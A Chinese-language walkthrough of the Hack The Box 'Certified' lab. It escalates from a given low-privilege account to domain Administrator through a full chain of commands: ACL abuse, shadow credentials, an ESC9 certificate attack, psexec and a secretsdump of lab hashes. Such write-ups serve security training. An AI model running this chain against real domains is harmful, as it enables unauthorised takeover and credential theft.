基本信息

这周机器开始测试新模式,直接给了低权限用户名密码

As is common in real life Windows pentests, you will start the Certified box with credentials for the following account: judith.mader / judith09

端口扫描

没有web端口,常规域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
$ nmap -sC -sV -Pn 10.10.11.41
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-04 13:28 CST
Nmap scan report for 10.10.11.41
Host is up (0.070s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-04 12:16:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m20s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m21s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m20s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-04T12:18:18+00:00; +6h47m21s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-11-04T12:17:40
|_ start_date: N/A
|_clock-skew: mean: 6h47m20s, deviation: 0s, median: 6h47m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.85 seconds

bloodhound

因为已经给了低权限账户,所以添加hosts后直接先bloodhound收集分析

1
2
3
10.10.11.41 certified.htb dc01.certified.htb

bloodhound-python -u judith.mader -p judith09 -d certified.htb -c All -dc DC01.certified.htb -gc DC01.certified.htb --zip --dns-tcp -ns 10.10.11.41

可以看到一条很明确的路径,judith.mader对management组有writeowner,management组对management_svc有genericwrite:

所以就是judith.mader先利用writeowner把自己设置为management组owner,然后添加自己进去,之后滥用对management_svc的genericwrite来获取management_svc

management

第一步滥用writeowner

1
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 set owner management judith.mader

然后给自己添加成员的权限后添加自己到management组中:

1
2
3
python3 examples/dacledit.py -action write -rights WriteMembers -principal judith.mader -target-dn "CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB" certified.htb/judith.mader:judith09

bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add groupMember management judith.mader

management_svc

之后滥用对management_svc的genericwrite权限,例如直接shadow creds:

(这里certipy版本可能会坑,mac里4.8.2的不行,kali里4.4.0的正常)

1
2
3
4
sudo ntpdate -s 10.10.11.41
certipy shadow auto -username judith.mader@certified.htb -p judith09 -account management_svc -dc-ip 10.10.11.41

[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

CA_OPERATOR

继续根据bloodhound,management_svc对CA_OPERATOR有genericall,那就同样的继续shadow creds获取ca_operator:

1
2
3
certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -dc-ip 10.10.11.41

[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2

ADCS

ca_operator根据名称就是对ca的操作相关,所以查看ADCS,发现ESC9:

1
2
3
4
certipy find -u 'ca_operator' -hashes b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.10.11.41 -vulnerable -stdout

certified-DC01-CA
CertifiedAuthentication

ESC9

参考:

根据文章示例修改命令,滥用esc9得到Administrator:

1
2
3
4
5
6
7
8
9
10
11
# 修改ca_operator的upn为Administrator
certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator -dc-ip 10.10.11.41

# 请求esc9证书
certipy req -username ca_operator@certified.htb -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication

# 还原ca_operator的upn
certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb -dc-ip 10.10.11.41

# 使用esc9证书认证,得到Administrator
certipy auth -pfx administrator.pfx -domain certified.htb

Flags

之后就是Administrator hash登录:

1
python3 examples/psexec.py Administrator@10.10.11.41 -hashes :0d5b49608bbce1751f708748f67e2d34

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ python3 examples/secretsdump.py Administrator@10.10.11.41 -hashes :0d5b49608bbce1751f708748f67e2d34 -just-dc-ntlm
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:41c6e6d9e7fe3f175b42df14a3815969:::
certified.htb\judith.mader:1103:aad3b435b51404eeaad3b435b51404ee:8ec62ac86259004c121a7df4243a7a80:::
certified.htb\management_svc:1105:aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584:::
certified.htb\ca_operator:1106:aad3b435b51404eeaad3b435b51404ee:b4b86f45c6018f1b664f70805f45d8f2:::
certified.htb\alexander.huges:1601:aad3b435b51404eeaad3b435b51404ee:cde915082011eef6f107ab4384124983:::
certified.htb\harry.wilson:1602:aad3b435b51404eeaad3b435b51404ee:37a50354c4a799ace944d130ed34cd03:::
certified.htb\gregory.cameron:1603:aad3b435b51404eeaad3b435b51404ee:b7ef92685ee618fc477f6b7668a829af:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:8f3cbea3908ffcde111e6a077c37dac4:::
[*] Cleaning up...

参考资料